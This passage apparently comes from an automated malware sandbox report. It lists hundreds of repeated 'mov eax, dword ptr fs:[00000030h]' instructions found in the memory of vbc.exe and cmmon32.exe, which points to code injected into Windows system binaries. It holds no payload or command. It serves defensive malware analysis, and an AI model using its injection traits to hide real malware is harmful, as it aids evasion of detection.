          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05590050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05590050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05632073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05641074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05644015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05644015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0560B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05648B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055F53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05645BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05581B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05581B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0562D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0562B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0562B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05648A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05579240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05604257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0557AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05593A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05575210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05575210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05575210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05575210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_05588A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0559A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0563AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055B4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0558AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055AFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B28CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B2740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8AC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AEC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A81DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B205AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A82581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A52D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A8FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B08DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A6D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B28D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04B1E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A84D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A5AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04ADA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A7C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04A93D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 17_2_04AD3540 mov eax, dword ptr fs:[00000030h]
